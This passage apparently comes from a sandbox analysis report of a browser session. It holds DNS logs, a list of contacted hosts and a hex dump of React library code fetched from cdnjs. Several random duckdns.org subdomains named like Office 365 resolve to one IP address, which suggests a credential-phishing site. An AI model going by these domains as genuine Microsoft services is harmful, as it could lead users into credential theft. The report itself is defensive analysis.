                                                                                                          Dec 24, 2024 20:57:05.347573996 CET192.168.2.41.1.1.10x81cdStandard query (0)public-eur.mkt.dynamics.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:17.036962986 CET192.168.2.41.1.1.10x2f13Standard query (0)officnxdbenbwamg.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:17.037122965 CET192.168.2.41.1.1.10xe831Standard query (0)officnxdbenbwamg.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:19.811569929 CET192.168.2.41.1.1.10x9104Standard query (0)o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:19.811722040 CET192.168.2.41.1.1.10x7040Standard query (0)o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:22.265137911 CET192.168.2.41.1.1.10x1275Standard query (0)vezzjxkd.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:22.266284943 CET192.168.2.41.1.1.10x5631Standard query (0)vezzjxkd.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:26.881644964 CET192.168.2.41.1.1.10xcb58Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:26.881788969 CET192.168.2.41.1.1.10x1405Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:27.090209007 CET192.168.2.41.1.1.10x7698Standard query (0)logedkdyvah.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:27.090363026 CET192.168.2.41.1.1.10xd0afStandard query (0)logedkdyvah.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:29.315498114 CET192.168.2.41.1.1.10xf2d6Standard query (0)o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:29.315653086 CET192.168.2.41.1.1.10x4743Standard query (0)o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org65IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Dec 24, 2024 20:56:12.637013912 CET1.1.1.1192.168.2.40x5e43No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:12.637120962 CET1.1.1.1192.168.2.40xa0a4No error (0)www.google.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:15.134006023 CET1.1.1.1192.168.2.40x85ebNo error (0)issuu.com151.101.129.55A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:15.134006023 CET1.1.1.1192.168.2.40x85ebNo error (0)issuu.com151.101.65.55A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:15.134006023 CET1.1.1.1192.168.2.40x85ebNo error (0)issuu.com151.101.1.55A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:15.134006023 CET1.1.1.1192.168.2.40x85ebNo error (0)issuu.com151.101.193.55A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:17.255819082 CET1.1.1.1192.168.2.40x86No error (0)static.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:17.274079084 CET1.1.1.1192.168.2.40x5faaNo error (0)static.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:19.321872950 CET1.1.1.1192.168.2.40x7fbcNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:19.321872950 CET1.1.1.1192.168.2.40x7fbcNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:19.322376013 CET1.1.1.1192.168.2.40xf453No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:21.500958920 CET1.1.1.1192.168.2.40xef4bNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:21.500958920 CET1.1.1.1192.168.2.40xef4bNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:21.501147985 CET1.1.1.1192.168.2.40x6397No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:23.039213896 CET1.1.1.1192.168.2.40x6335No error (0)static.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:23.039611101 CET1.1.1.1192.168.2.40x276bNo error (0)static.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:23.260592937 CET1.1.1.1192.168.2.40x384fNo error (0)o4505883345354752.ingest.sentry.io34.120.195.249A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:23.271924973 CET1.1.1.1192.168.2.40xcafNo error (0)reader3.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:23.316210985 CET1.1.1.1192.168.2.40x8ad6No error (0)reader3.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:23.527261019 CET1.1.1.1192.168.2.40x3860No error (0)issuu.com151.101.129.55A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:23.527261019 CET1.1.1.1192.168.2.40x3860No error (0)issuu.com151.101.1.55A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:23.527261019 CET1.1.1.1192.168.2.40x3860No error (0)issuu.com151.101.193.55A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:23.527261019 CET1.1.1.1192.168.2.40x3860No error (0)issuu.com151.101.65.55A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.106224060 CET1.1.1.1192.168.2.40x535cNo error (0)consent.cookiebot.comconsent.cookiebot.com-v2.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.172385931 CET1.1.1.1192.168.2.40xd17dNo error (0)pingback.issuu.combigpingback.issuu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.172537088 CET1.1.1.1192.168.2.40xee8fNo error (0)pingback.issuu.combigpingback.issuu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.172537088 CET1.1.1.1192.168.2.40xee8fNo error (0)bigpingback.issuu.com35.241.35.151A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.203042030 CET1.1.1.1192.168.2.40xc0f5No error (0)consent.cookiebot.comconsent.cookiebot.com-v2.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.224965096 CET1.1.1.1192.168.2.40x9697No error (0)o4505883345354752.ingest.sentry.io34.120.195.249A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.333729982 CET1.1.1.1192.168.2.40x8d5No error (0)reader3.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.333951950 CET1.1.1.1192.168.2.40x658No error (0)reader3.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.410360098 CET1.1.1.1192.168.2.40xb555No error (0)assets.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.420494080 CET1.1.1.1192.168.2.40x1387No error (0)assets.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.538271904 CET1.1.1.1192.168.2.40x241bNo error (0)layers.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.570888996 CET1.1.1.1192.168.2.40x3a2No error (0)layers.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.571665049 CET1.1.1.1192.168.2.40x63dcNo error (0)api.issuu.comwww.issuu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.571665049 CET1.1.1.1192.168.2.40x63dcNo error (0)www.issuu.comdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.578398943 CET1.1.1.1192.168.2.40x25c0No error (0)api.issuu.comwww.issuu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.578398943 CET1.1.1.1192.168.2.40x25c0No error (0)www.issuu.comdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:27.973967075 CET1.1.1.1192.168.2.40xc464No error (0)image.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:27.992341042 CET1.1.1.1192.168.2.40xba07No error (0)image.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:28.594093084 CET1.1.1.1192.168.2.40xcfefNo error (0)assets.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:28.594108105 CET1.1.1.1192.168.2.40x6a1bNo error (0)assets.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:28.598330975 CET1.1.1.1192.168.2.40xe09aNo error (0)api.issuu.comwww.issuu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:28.598330975 CET1.1.1.1192.168.2.40xe09aNo error (0)www.issuu.comdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:28.599349022 CET1.1.1.1192.168.2.40xa382No error (0)api.issuu.comwww.issuu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:28.599349022 CET1.1.1.1192.168.2.40xa382No error (0)www.issuu.comdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:28.601099014 CET1.1.1.1192.168.2.40x6827No error (0)layers.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:28.601418018 CET1.1.1.1192.168.2.40xe68bNo error (0)layers.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:30.480420113 CET1.1.1.1192.168.2.40xac0eNo error (0)image.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:30.482379913 CET1.1.1.1192.168.2.40x79acNo error (0)image.isu.pubdualstack.m.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:33.231836081 CET1.1.1.1192.168.2.40x696cNo error (0)spidersense.bendingspoons.com34.36.49.68A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:36.776642084 CET1.1.1.1192.168.2.40x5832No error (0)spidersense.bendingspoons.com34.36.49.68A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:38.966732025 CET1.1.1.1192.168.2.40x3de0No error (0)assets-eur.mkt.dynamics.comassets-mkt-eur.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:39.050899982 CET1.1.1.1192.168.2.40x1220No error (0)assets-eur.mkt.dynamics.comassets-mkt-eur.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:39.050899982 CET1.1.1.1192.168.2.40x1220No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:39.050899982 CET1.1.1.1192.168.2.40x1220No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:42.257282019 CET1.1.1.1192.168.2.40xf973No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:42.257282019 CET1.1.1.1192.168.2.40xf973No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:56.834875107 CET1.1.1.1192.168.2.40x725fNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:56.834875107 CET1.1.1.1192.168.2.40x725fNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:00.064567089 CET1.1.1.1192.168.2.40xb805No error (0)assets-eur.mkt.dynamics.comassets-mkt-eur.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:00.065021992 CET1.1.1.1192.168.2.40x172dNo error (0)assets-eur.mkt.dynamics.comassets-mkt-eur.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:00.065021992 CET1.1.1.1192.168.2.40x172dNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:00.065021992 CET1.1.1.1192.168.2.40x172dNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:00.323544025 CET1.1.1.1192.168.2.40x8141No error (0)public-eur.mkt.dynamics.comcxppeur1umejvsjeywhjm.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:00.323544025 CET1.1.1.1192.168.2.40x8141No error (0)public-prdia888neu0aks.mkt.dynamics.comprdia888neu0aks.mkt.dynamics.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:00.323544025 CET1.1.1.1192.168.2.40x8141No error (0)prdia888neu0aks.mkt.dynamics.com52.146.128.240A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:00.335148096 CET1.1.1.1192.168.2.40x7e9bNo error (0)public-eur.mkt.dynamics.comcxppeur1umejvsjeywhjm.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:00.335148096 CET1.1.1.1192.168.2.40x7e9bNo error (0)public-prdia888neu0aks.mkt.dynamics.comprdia888neu0aks.mkt.dynamics.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:05.485693932 CET1.1.1.1192.168.2.40x81cdNo error (0)public-eur.mkt.dynamics.comcxppeur1umejvsjeywhjm.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:05.485693932 CET1.1.1.1192.168.2.40x81cdNo error (0)public-prdia888neu0aks.mkt.dynamics.comprdia888neu0aks.mkt.dynamics.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:05.485855103 CET1.1.1.1192.168.2.40x6e54No error (0)public-eur.mkt.dynamics.comcxppeur1umejvsjeywhjm.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:05.485855103 CET1.1.1.1192.168.2.40x6e54No error (0)public-prdia888neu0aks.mkt.dynamics.comprdia888neu0aks.mkt.dynamics.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:05.485855103 CET1.1.1.1192.168.2.40x6e54No error (0)prdia888neu0aks.mkt.dynamics.com52.146.128.240A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:17.566761017 CET1.1.1.1192.168.2.40x2f13No error (0)officnxdbenbwamg.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org20.117.200.191A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:20.154877901 CET1.1.1.1192.168.2.40x9104No error (0)o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org20.117.200.191A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:22.603852034 CET1.1.1.1192.168.2.40x1275No error (0)vezzjxkd.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org20.117.200.191A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:27.018343925 CET1.1.1.1192.168.2.40xcb58No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:27.018343925 CET1.1.1.1192.168.2.40xcb58No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:27.018343925 CET1.1.1.1192.168.2.40xcb58No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:27.018851995 CET1.1.1.1192.168.2.40x9eNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:27.018851995 CET1.1.1.1192.168.2.40x9eNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:27.020749092 CET1.1.1.1192.168.2.40x1405No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:27.020749092 CET1.1.1.1192.168.2.40x1405No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:27.445463896 CET1.1.1.1192.168.2.40x7698No error (0)logedkdyvah.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org20.117.200.191A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:29.452821016 CET1.1.1.1192.168.2.40x8f9dNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:29.452821016 CET1.1.1.1192.168.2.40x8f9dNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:29.456567049 CET1.1.1.1192.168.2.40xf2d6No error (0)o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org20.117.200.191A (IP address)IN (0x0001)false
                                                                                                          • https:
                                                                                                            • cdnjs.cloudflare.com
                                                                                                            • o4505883345354752.ingest.sentry.io
                                                                                                            • pingback.issuu.com
                                                                                                            • spidersense.bendingspoons.com
                                                                                                            • assets-eur.mkt.dynamics.com
                                                                                                            • o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
                                                                                                            • logedkdyvah.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
                                                                                                          • public-eur.mkt.dynamics.com
                                                                                                          • officnxdbenbwamg.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
                                                                                                          • vezzjxkd.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449745104.17.24.144435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:20 UTC563OUTGET /ajax/libs/react/17.0.2/umd/react.production.min.js HTTP/1.1
                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:56:21 UTC960INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 24 Dec 2024 19:56:21 GMT
                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                          ETag: W/"6059360d-2cb0"
                                                                                                          Last-Modified: Tue, 23 Mar 2021 00:27:57 GMT
                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                          Timing-Allow-Origin: *
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 509336
                                                                                                          Expires: Sun, 14 Dec 2025 19:56:21 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mQooNv5KtiK8hJ%2FY0Gtiil%2FDtQeO%2BdXRx0RkPBLkL3RILVw7TLj3D8BOQD4hF8taZ0fnvASntiJOLeBHhGQjtF1FYHKlKOOxkbgsOY1b62hbs26YAUXJfpZkv1j%2FjI5zEYNULyY1"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f732778489f43fa-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2024-12-24 19:56:21 UTC409INData Raw: 32 63 62 30 0d 0a 2f 2a 2a 20 40 6c 69 63 65 6e 73 65 20 52 65 61 63 74 20 76 31 37 2e 30 2e 32 0a 20 2a 20 72 65 61 63 74 2e 70 72 6f 64 75 63 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 61 6e 64 20 69 74 73 20 61 66 66 69 6c 69 61 74 65 73 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 0a 20 2a 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 74 72 65 65 2e 0a 20 2a 2f 0a 28 66 75 6e 63 74 69
                                                                                                          Data Ascii: 2cb0/** @license React v17.0.2 * react.production.min.js * * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */(functi
                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 22 5d 2c 78 29 3a 28 63 3d 63 7c 7c 73 65 6c 66 2c 78 28 63 2e 52 65 61 63 74 3d 7b 7d 29 29 7d 29 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 63 29 7b 66 75 6e 63 74 69 6f 6e 20 78 28 61 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 61 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 3d 74 79 70 65 6f 66 20 61 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 61 3d 59 26 26 61 5b 59 5d 7c 7c 61 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 61 3f 61 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 79 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 22 68 74 74 70 73 3a 2f 2f 72 65 61 63 74 6a 73 2e 6f 72 67 2f 64 6f 63 73 2f 65 72 72 6f 72 2d 64 65 63 6f 64 65 72 2e 68 74 6d 6c 3f 69 6e 76 61 72 69 61 6e 74 3d 22 2b 61 2c
                                                                                                          Data Ascii: "],x):(c=c||self,x(c.React={}))})(this,function(c){function x(a){if(null===a||"object"!==typeof a)return null;a=Y&&a[Y]||a["@@iterator"];return"function"===typeof a?a:null}function y(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,
                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 3d 0a 74 79 70 65 6f 66 20 61 26 26 6e 75 6c 6c 21 3d 3d 61 26 26 6e 75 6c 6c 21 3d 61 2e 6b 65 79 3f 77 61 28 22 22 2b 61 2e 6b 65 79 29 3a 62 2e 74 6f 53 74 72 69 6e 67 28 33 36 29 7d 66 75 6e 63 74 69 6f 6e 20 43 28 61 2c 62 2c 65 2c 6c 2c 66 29 7b 76 61 72 20 63 3d 74 79 70 65 6f 66 20 61 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 63 7c 7c 22 62 6f 6f 6c 65 61 6e 22 3d 3d 3d 63 29 61 3d 6e 75 6c 6c 3b 76 61 72 20 64 3d 21 31 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 61 29 64 3d 21 30 3b 65 6c 73 65 20 73 77 69 74 63 68 28 63 29 7b 63 61 73 65 20 22 73 74 72 69 6e 67 22 3a 63 61 73 65 20 22 6e 75 6d 62 65 72 22 3a 64 3d 21 30 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 6f 62 6a 65 63 74 22 3a 73 77 69 74 63 68 28 61
                                                                                                          Data Ascii: urn"object"===typeof a&&null!==a&&null!=a.key?wa(""+a.key):b.toString(36)}function C(a,b,e,l,f){var c=typeof a;if("undefined"===c||"boolean"===c)a=null;var d=!1;if(null===a)d=!0;else switch(c){case "string":case "number":d=!0;break;case "object":switch(a
                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 29 3b 61 3a 66 6f 72 28 3b 3b 29 7b 76 61 72 20 63 3d 65 2d 31 3e 3e 3e 31 2c 66 3d 61 5b 63 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 66 26 26 30 3c 45 28 66 2c 62 29 29 61 5b 63 5d 3d 62 2c 61 5b 65 5d 3d 66 2c 65 3d 63 3b 65 6c 73 65 20 62 72 65 61 6b 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 61 29 7b 61 3d 61 5b 30 5d 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 61 3f 6e 75 6c 6c 3a 61 7d 66 75 6e 63 74 69 6f 6e 20 46 28 61 29 7b 76 61 72 20 62 3d 0a 61 5b 30 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 62 29 7b 76 61 72 20 65 3d 61 2e 70 6f 70 28 29 3b 69 66 28 65 21 3d 3d 62 29 7b 61 5b 30 5d 3d 65 3b 61 3a 66 6f 72 28 76 61 72 20 63 3d 30 2c 66 3d 61 2e 6c 65 6e 67 74 68 3b 63 3c 66 3b 29 7b 76 61 72 20 64 3d 32 2a 28 63 2b 31 29 2d 31 2c 67
                                                                                                          Data Ascii: );a:for(;;){var c=e-1>>>1,f=a[c];if(void 0!==f&&0<E(f,b))a[c]=b,a[e]=f,e=c;else break a}}function p(a){a=a[0];return void 0===a?null:a}function F(a){var b=a[0];if(void 0!==b){var e=a.pop();if(e!==b){a[0]=e;a:for(var c=0,f=a.length;c<f;){var d=2*(c+1)-1,g
